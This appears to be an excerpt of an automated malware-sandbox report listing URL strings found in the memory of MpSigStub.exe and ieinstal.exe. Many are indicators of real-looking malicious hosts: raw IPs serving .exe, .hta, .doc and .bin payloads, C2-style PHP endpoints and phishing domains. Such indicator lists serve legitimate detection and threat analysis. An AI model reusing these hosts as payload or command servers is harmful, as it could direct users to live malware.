Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://%s/in.php
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://%s/index.htm?content=%s&id=%d
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://%s/index.htm?id=%4d&content=%s
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://%s/inspection.aspx?index=stripbooks
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://%s/jbinfo.cgi?%s:%d
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://%s/kx.php
Source: MpSigStub.exe, 00000026.00000003.18309912138.00000138BE5E8000.00000004.00000001.sdmp	String found in binary or memory: http://%s/live.php?backupquery=%s
Source: MpSigStub.exe, 00000026.00000003.18332044939.00000138BE4E0000.00000004.00000001.sdmp	String found in binary or memory: http://%s/loads.php
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://%s/loads2.php?r=%s
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://%s/mirror/ret.aspx?content=%s
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: http://%s/search/search.cgi?s
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://%s/search/search.cgi?src=autosearch&s=%s
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	String found in binary or memory: http://%s/support.php
Source: MpSigStub.exe, 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp	String found in binary or memory: http://%s/sync.php
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://%s:%d/%s%d%08dindex.asp?ToDowbSVCHOST.EXErbSeDe
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://%s:%d/%s%d%sindex.asp?%u%dOEMCP
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://%s:%d/%sPOSTid=41.php?
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://%s:%d/index.cgi
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://%s:%s/bks.asp
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://%sMozilla/4.0
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://(.-/)
Source: MpSigStub.exe, 00000026.00000003.18292462058.00000138BDF8A000.00000004.00000001.sdmp	String found in binary or memory: http://.(www.blackcheta.blogspot.com/)
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://.exeuser32.dll
Source: MpSigStub.exe, 00000026.00000003.18252515965.00000138ADB0C000.00000004.00000001.sdmp	String found in binary or memory: http://.ocx.cabhtml:file:ftp://
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://.online/
Source: MpSigStub.exe, 00000026.00000003.18292462058.00000138BDF8A000.00000004.00000001.sdmp	String found in binary or memory: http://0-2-t-9-r-6-p-4-4-4-s-0-h-e-.i-k-r-g-1-0-u-5-1-f-3-g-li-9-p-1-x-t-6-g-l-8-m-q-y-s-k-6-l.info
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://0.82211.net/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://00.1.00.2.1.11.9.online.secured.adobe.protected.file.version.9.8.online.verification.access.v
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://0147.0131.0133.0174/..----------------------....................-.....................-/.....
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	String found in binary or memory: http://03ptc6fk0.ru/clogs/index.php?
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://0c00.cc/0c_data.cc
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://1-0-9.cn/zxc/index.htm
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://102.165.32.158/dash/sk.hta
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://103.133.106.72/ini/................wbk
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://103.140.251.93/_....-------------------------.....------------_----/
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://103.149.12.183/bigi.doc
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://103.149.12.183/p1.doc
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://103.149.12.183/u1.doc
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://103.213.245.135/n.hta
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://104.153.45.242/~cimbonli//wp-content/upload/ken.exe
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://104.236.94.
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: http://104.243.35.43
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://107.170.47.94/mdsatalho/
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: http://107.172.130.145/
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://107.173.191.48/deck/m.dot
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://107.173.219.115:4560/press1.exe
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://107.173.219.80/
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://107.173.219.80/-.............................................................................
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: http://107.189.10.150/ht/
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://108.61.208.60
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://109.248.148.42/officedocument/2006/relationships/templates.dotm
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://110.34.232.11:1314
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: http://110.42.4.180:
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://112.164.188.12/hza.html
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://116.37.147.205/hit.php
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://118.184.48.95:8000/info
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://119.249.54.113/
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://120.125.201.101/logo/
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://120061996-783405463700123057.preview.editmysite.com/uploads/1/2/0
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://121.14.
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://122.228.228.7
Source: MpSigStub.exe, 00000026.00000003.18338078941.00000138BD104000.00000004.00000001.sdmp	String found in binary or memory: http://123support.online/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://123zphimonline.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1/down/list2.txt
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1/m.htmwidth=0height=0
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1/tracking?source=
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:20202/remind.html
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:8081/dial.html?
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:8089/index.html?
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:8332
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:8545
Source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:9600/IperiusHSa
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://13.233.183.227/de/lngukm2012920/bestellungen/zahlung
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://131.153.38.125/
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: http://134.249.116.78/cloud.php/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://139.162.
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://144.217.14.173/doc.doc
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://149.202.110.58/document_012001.doc
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://149.3.170.235/qw-fad/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://151.248.115.253/%sproc0%%sproc0%exit
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://152.89.218.86/
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://158.255.1.137/1/live.php
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://158.255.5.220
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://164.132.171.89/promo.php
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://167.114.35.111/~miraclen/sul2/sul2.exe
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://169.54.172.92/coreslibri.zip
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://170.130.55.135/api.php
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://172.16.1.1/exm.rtf
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://172.245.119.81/.----------------------.------------------------------.-/s.wbk
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://172.98.73.57
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://178.128.11.199/qtx.
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://178.128.115.182/wp-includes/3_y/
Source: ieinstal.exe, 0000000D.00000002.19666716558.00000000031DD000.00000004.00000020.sdmp	String found in binary or memory: http://178.32.63.50/
Source: ieinstal.exe, 0000000D.00000002.19666716558.00000000031DD000.00000004.00000020.sdmp	String found in binary or memory: http://178.32.63.50/Qe
Source: ieinstal.exe, 0000000D.00000002.19665461719.0000000003080000.00000004.00000001.sdmp	String found in binary or memory: http://178.32.63.50/bvbs/Host_hKVPgVgQ234.bin
Source: ieinstal.exe, 0000000D.00000002.19665461719.0000000003080000.00000004.00000001.sdmp, ieinstal.exe, 0000000D.00000002.19665992440.0000000003198000.00000004.00000020.sdmp	String found in binary or memory: http://178.32.63.50/mvbs/Host_hKVPgVgQ234.bin
Source: ieinstal.exe, 0000000D.00000002.19665461719.0000000003080000.00000004.00000001.sdmp	String found in binary or memory: http://178.32.63.50/mvbs/Host_hKVPgVgQ234.binhttp://178.32.63.50/bvbs/Host_hKVPgVgQ234.binwininet.dl
Source: ieinstal.exe, 0000000D.00000002.19665992440.0000000003198000.00000004.00000020.sdmp	String found in binary or memory: http://178.32.63.50/mvbs/Host_hKVPgVgQ234.bink
Source: ieinstal.exe, 0000000D.00000002.19665992440.0000000003198000.00000004.00000020.sdmp	String found in binary or memory: http://178.32.63.50/mvbs/Host_hKVPgVgQ234.binm
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://178.62.19.66/campo/v/v
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	String found in binary or memory: http://178.79.137.25/campo/
Source: MpSigStub.exe, 00000026.00000003.18303554710.00000138BE851000.00000004.00000001.sdmp	String found in binary or memory: http://179.43.158.187/PhtJFr0fvBk2.php
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://18.130.111.206/wp/x_y/
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://181.174.166.137/sys/f4.exe
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	String found in binary or memory: http://184.105.163.238/
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://185.14.30.131/api.php
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://185.141.25.168/check_attack/
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://185.153.198.216:8010/UserService
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://185.165.30.31
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://185.172.110.217/kvsn/image.png
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://185.172.110.217/robx/remit.jpg
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: http://185.180.197.66/2vjdz6jaqzeiq.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://185.183.98.246/150/DL-13306.jpg
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://185.225.19.240/dmenconsvc.dll
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://185.236.231.209/xcel/copy/xel.phpmethod=post
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://185.236.231.210/test/en/dsf.php
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://185.239.242.71
Source: MpSigStub.exe, 00000026.00000003.18339634370.00000138BD24F000.00000004.00000001.sdmp	String found in binary or memory: http://185.243.215.213/sys_info.vbs
Source: MpSigStub.exe, 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp	String found in binary or memory: http://185.250.149.128/
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://185.38.142.91/awo/
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://185.38.142.91/awo/next.php
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://185.82.218.2/
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://185.82.218.30/44313
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://187.157.146.147/m0rpheus/index.php?mon=
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://190.14.37.190/
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://191.101.239.86/root/migytkyt5bberd
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://192.168.0.108/download.ps1
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: http://192.168.1.60/6464.exe
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: http://192.168.213.131/logo.doc
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://192.168.88.
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://192.189.25.17/cgbin/ukbros
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://192.227.228.85/.--...........................................................................
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://192.236.147.189/execute/uploads/Excel.sct
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: http://192.3.141.134/document_m.doc
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://192.3.141.173/word/
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://192.3.152.134/nda/document.doc
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://192.3.22.5/.-................................................................................
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://193.107.19.250:89/users/gigi_eli/ax.php
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: http://193.203.202.55/
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://193.38.55.92/gfmppbpq
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://194.145.227.21sys=$(date
Source: MpSigStub.exe, 00000026.00000003.18348616803.00000138BCC0C000.00000004.00000001.sdmp	String found in binary or memory: http://194.178.112.202
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://194.5.249.101/api.php
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: http://194.5.249.107/2nquxqz2ok4a45l.php
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://195.123.219.21/campo/t3/t3d
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://195.123.220.249/campo/t2/t2dcdddebp%&c
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://195.123.235.1/
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://195.226.220.112/~admin/.
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://195.5.116.250/ex/static.php
Source: MpSigStub.exe, 00000026.00000003.18309912138.00000138BE5E8000.00000004.00000001.sdmp	String found in binary or memory: http://195.78.108.
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://198.12.127.217/.--------------------------.--------------........-...................-/_.....
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://198.23.212.187/_......................................_......................-/
Source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp	String found in binary or memory: http://198.23.213.25/document.doc
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://198.23.251.121/_--_-_---_-_--__------_.......................................................
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://198.46.132.163/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://198.46.132.185/.--_------------------------------------------.-----/
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://198.46.201.115/.-...................................................-.-/..-------------------
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://1animalsnames.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://1bestgate.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://1lxtjdias-pod:8080/stage3.exe
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://200.159.128.
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://200.63.45.105/duiss/duiss
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://200.63.45.105/sado/sado.exe
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://200.74.240.151/saturno/w7.txt
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://200.74.240.151/saturno/w8.txt
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://200.98.
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://2010-kpss.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://2012-wallpaper-hd.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://2014secimleriturkiye.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://202.104.11.94
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://203.199.200.61
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://205.177.124.74/
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://205.185.116.78/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://205.185.122.246/FQL66n
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://205.185.122.246/b9xbb3
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://205.185.122.246/files/may13.bin
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://205.185.122.246/jMLqH8
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://205.185.122.246/khkwZF
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://205.185.125.104/1t1nnx
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	String found in binary or memory: http://205.185.125.104/pqbtwj
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	String found in binary or memory: http://205.185.125.104/yxsz8k
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://205.252.24.246/
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://207.154.225.82/report.json?type=mail&u=$muser&c=
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://207.226.171.35/
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://207.226.171.36/
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	String found in binary or memory: http://207.226.177.108/sc.exe
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://207.58.162.237/spy/cartao.scr
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://208.115.201.245/ideal.zip
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://208.95.104.
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://209.141.54.161/files/crypt.dll
Source: MpSigStub.exe, 00000026.00000003.18350786721.00000138BD66E000.00000004.00000001.sdmp	String found in binary or memory: http://209.141.61.124/Q-2/
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: http://209.141.61.124/q-2/dy5434app14.exe
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://209.141.61.124/q-2/img_0107803.exe
